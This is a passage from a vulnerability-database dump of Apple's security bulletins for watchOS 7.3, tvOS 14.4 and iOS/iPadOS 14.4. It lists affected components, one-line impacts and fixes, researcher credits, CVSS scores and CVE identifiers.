Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1744: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin of Ant-Financial Light-Year Security Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1742: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1746: Jeonghoon Shin(@singi21a) of THEORI, Mickey Jin & Qi Sun of Trend Micro working with Trend Micro\u2019s Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1754: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1774: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1777: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1793: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1741: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1743: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2021-1778: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2021-1783: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**IOSkywalkFamily**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1757: Proteas and Pan ZhenPeng (@Peterpan0927) of Alibaba Security\n\nEntry added February 1, 2021\n\n**iTunes Store**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing a maliciously crafted URL may lead to arbitrary javascript code execution\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2021-1748: CodeColorist working with Ant Security Light-Year Labs\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1764: @m00nbsd\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1750: @0xalsr\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1782: an anonymous researcher\n\n**Swift**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2021-1769: CodeColorist of Ant-Financial Light-Year Labs\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1788: Francisco Alonso (@revskills)\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1789: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: Maliciously crafted web content may violate iframe sandboxing policy\n\nDescription: This issue was addressed with improved iframe sandbox enforcement.\n\nCVE-2021-1801: Eliya Stein of Confiant\n\nEntry added February 1, 2021\n\n**WebRTC**\n\nAvailable for: Apple Watch Series 3 and later\n\nImpact: A malicious website may be able to access restricted ports on arbitrary servers\n\nDescription: A port redirection issue was addressed with additional port validation.\n\nCVE-2021-1799: Gregory Vishnepolsky & Ben Seri of Armis Security, and Samy Kamkar\n\nEntry added February 1, 2021\n\n\n\n## Additional recognition\n\n**iTunes Store**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Kernel**\n\nWe would like to acknowledge Junzhi Lu (@pwn0rz), Mickey Jin & Jesse Change of Trend Micro for their assistance.\n\nEntry added February 1, 2021\n\n**libpthread**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Store Demo**\n\nWe would like to acknowledge @08Tc3wBB for their assistance.\n\nEntry added February 1, 2021\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 16, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-26T00:00:00", "type": "apple", "title": "About the security content of watchOS 7.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1741", "CVE-2021-1742", "CVE-2021-1743", "CVE-2021-1744", "CVE-2021-1746", "CVE-2021-1747", "CVE-2021-1748", "CVE-2021-1750", "CVE-2021-1754", "CVE-2021-1757", "CVE-2021-1758", "CVE-2021-1760", "CVE-2021-1761", "CVE-2021-1764", "CVE-2021-1766", "CVE-2021-1769", "CVE-2021-1772", "CVE-2021-1773", "CVE-2021-1774", "CVE-2021-1776", "CVE-2021-1777", "CVE-2021-1778", "CVE-2021-1782", "CVE-2021-1783", "CVE-2021-1785", "CVE-2021-1786", "CVE-2021-1787", "CVE-2021-1788", "CVE-2021-1789", "CVE-2021-1791", "CVE-2021-1792", "CVE-2021-1793", "CVE-2021-1797", "CVE-2021-1799", "CVE-2021-1801", "CVE-2021-1818"], "modified": "2021-01-26T00:00:00", "id": "APPLE:B69E745380EF6BD25EB61E697869CC84", "href": "https://support.apple.com/kb/HT212148", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:28:35", "description": "# About the security content of tvOS 14.4\n\nThis document describes the security content of tvOS 14.4.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## tvOS 14.4\n\nReleased January 26, 2021\n\n**Analytics**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\nEntry added February 1, 2021\n\n**APFS**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\nEntry added February 1, 2021\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application could execute arbitrary code leading to compromise of user information\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1760: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**CoreAudio**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1747: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**CoreGraphics**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1776: Ivan Fratric of Google Project Zero\n\nEntry added February 1, 2021\n\n**CoreMedia**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1759: Hou JingYi (@hjy79425575) of Qihoo 360 CERT\n\nEntry added February 1, 2021\n\n**CoreText**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted text file may lead to arbitrary code execution\n\nDescription: A stack overflow was addressed with improved input validation.\n\nCVE-2021-1772: Mickey Jin (@patch1t) of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**CoreText**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1792: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**Crash Reporter**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local user may be able to create or modify system files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1786: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added February 1, 2021\n\n**Crash Reporter**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1787: James Hutchins\n\nEntry added February 1, 2021\n\n**FairPlay**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2021-1791: Junzhi Lu(@pwn0rz), Qi Sun and Mickey Jin of Trend Micro working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1758: Peter Nguyen of STAR Labs\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin of Ant-Financial Light-Year Security Lab\n\nEntry added March 16, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1766: Danny Rosseau of Carve Systems\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1785: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1744: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin of Ant-Financial Light-Year Security Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1742: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1746: Jeonghoon Shin(@singi21a) of THEORI, Mickey Jin & Qi Sun of Trend Micro working with Trend Micro\u2019s Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1754: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1774: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1777: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1793: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1773: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1741: Xingwei Lin of Ant Security Light-Year Lab\n\nCVE-2021-1743: Mickey Jin & Junzhi Lu of Trend Micro working with Trend Micro\u2019s Zero Day Initiative, Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An out-of-bounds read issue existed in the curl. This issue was addressed with improved bounds checking.\n\nCVE-2021-1778: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An access issue was addressed with improved memory management.\n\nCVE-2021-1783: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**IOSkywalkFamily**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1757: Proteas and Pan ZhenPeng (@Peterpan0927) of Alibaba Security\n\nEntry added February 1, 2021\n\n**iTunes Store**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing a maliciously crafted URL may lead to arbitrary javascript code execution\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2021-1748: CodeColorist working with Ant Security Light-Year Labs\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1764: @m00nbsd\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1750: @0xalsr\n\nEntry added February 1, 2021\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2021-1782: an anonymous researcher\n\n**Swift**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2021-1769: CodeColorist of Ant-Financial Light-Year Labs\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed with improved memory management.\n\nCVE-2021-1788: Francisco Alonso (@revskills)\n\nEntry added February 1, 2021, updated March 16, 2021\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved state handling.\n\nCVE-2021-1789: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: Maliciously crafted web content may violate iframe sandboxing policy\n\nDescription: This issue was addressed with improved iframe sandbox enforcement.\n\nCVE-2021-1801: Eliya Stein of Confiant\n\nEntry added February 1, 2021\n\n**WebRTC**\n\nAvailable for: Apple TV 4K and Apple TV HD\n\nImpact: A malicious website may be able to access restricted ports on arbitrary servers\n\nDescription: A port redirection issue was addressed with additional port validation.\n\nCVE-2021-1799: Gregory Vishnepolsky & Ben Seri of Armis Security, and Samy Kamkar\n\nEntry added February 1, 2021\n\n\n\n## Additional recognition\n\n**iTunes Store**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Kernel**\n\nWe would like to acknowledge Junzhi Lu (@pwn0rz), Mickey Jin & Jesse Change of Trend Micro for their assistance.\n\nEntry added February 1, 2021\n\n**libpthread**\n\nWe would like to acknowledge CodeColorist of Ant-Financial Light-Year Labs for their assistance.\n\nEntry added February 1, 2021\n\n**Store Demo**\n\nWe would like to acknowledge @08Tc3wBB for their assistance.\n\nEntry added February 1, 2021\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 16, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-26T00:00:00", "type": "apple", "title": "About the security content of tvOS 14.4", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1741", "CVE-2021-1742", "CVE-2021-1743", "CVE-2021-1744", "CVE-2021-1746", "CVE-2021-1747", "CVE-2021-1748", "CVE-2021-1750", "CVE-2021-1754", "CVE-2021-1757", "CVE-2021-1758", "CVE-2021-1759", "CVE-2021-1760", "CVE-2021-1761", "CVE-2021-1764", "CVE-2021-1766", "CVE-2021-1769", "CVE-2021-1772", "CVE-2021-1773", "CVE-2021-1774", "CVE-2021-1776", "CVE-2021-1777", "CVE-2021-1778", "CVE-2021-1782", "CVE-2021-1783", "CVE-2021-1785", "CVE-2021-1786", "CVE-2021-1787", "CVE-2021-1788", "CVE-2021-1789", "CVE-2021-1791", "CVE-2021-1792", "CVE-2021-1793", "CVE-2021-1797", "CVE-2021-1799", "CVE-2021-1801", "CVE-2021-1818"], "modified": "2021-01-26T00:00:00", "id": "APPLE:F8BE10D8CFAE590690202C33D00B6E6B", "href": "https://support.apple.com/kb/HT212149", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-02T04:42:46", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n\n\n## iOS 14.4 and iPadOS 14.4\n\nReleased January 26, 2021\n\n**Analytics**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1761: Cees Elzinga\n\nEntry added February 1, 2021\n\n**APFS**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A local user may be able to read arbitrary files\n\nDescription: The issue was addressed with improved permissions logic.\n\nCVE-2021-1797: Thomas Tempelmann\n\nEntry added February 1, 2021\n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1794: Jianjun Dai of 360 Alpha Lab\n\nEntry added February 1, 2021\n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1795: Jianjun Dai of 360 Alpha Lab\n\nCVE-2021-1796: Jianjun Dai of 360 Alpha Lab\n\nEntry added February 1, 2021\n\n**Bluetooth**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2021-1780: Jianjun Dai of 360 Alpha Lab\n\nEntry added February 1, 2021\n\n**CoreAnimation**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application could execute arbitrary code leading to compromise of user information\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2021-1760: @S0rryMybad of 360 Vulcan Team\n\nEntry added February 1, 2021\n\n**CoreAudio**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing maliciously crafted web content may lead to code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1747: JunDong Xie of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**CoreGraphics**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: An out-of-bounds write issue was addressed with improved bounds checking.\n\nCVE-2021-1776: Ivan Fratric of Google Project Zero\n\nEntry added February 1, 2021\n\n**CoreMedia**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1759: Hou JingYi (@hjy79425575) of Qihoo 360 CERT\n\nEntry added February 1, 2021\n\n**CoreText**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted text file may lead to arbitrary code execution\n\nDescription: A stack overflow was addressed with improved input validation.\n\nCVE-2021-1772: Mickey Jin of Trend Micro\n\nEntry added February 1, 2021\n\n**CoreText**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1792: Mickey Jin & Junzhi Lu of Trend Micro\n\nEntry added February 1, 2021\n\n**Crash Reporter**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A local user may be able to create or modify system files\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1786: Csaba Fitzl (@theevilbit) of Offensive Security\n\nEntry added February 1, 2021\n\n**Crash Reporter**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A local attacker may be able to elevate their privileges\n\nDescription: Multiple issues were addressed with improved logic.\n\nCVE-2021-1787: James Hutchins\n\nEntry added February 1, 2021\n\n**FairPlay**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A malicious application may be able to disclose kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed with improved input validation.\n\nCVE-2021-1791: Junzhi Lu (@pwn0rz), Qi Sun & Mickey Jin of Trend Micro\n\nEntry added February 1, 2021\n\n**FontParser**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2021-1758: Peter Nguyen of STAR Labs\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1773: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1766: Danny Rosseau of Carve Systems\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2021-1785: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: An out-of-bounds write was addressed with improved input validation.\n\nCVE-2021-1744: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2021-1818: Xingwei Lin from Ant-Financial Light-Year Security Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2021-1746: Xingwei Lin of Ant Security Light-Year Lab, and Mickey Jin & Qi Sun of Trend Micro\n\nCVE-2021-1793: Xingwei Lin of Ant Security Light-Year Lab\n\nEntry added February 1, 2021\n\n**ImageIO**\n\nAvailable for: iPhone 6s and later, iPad Air 2 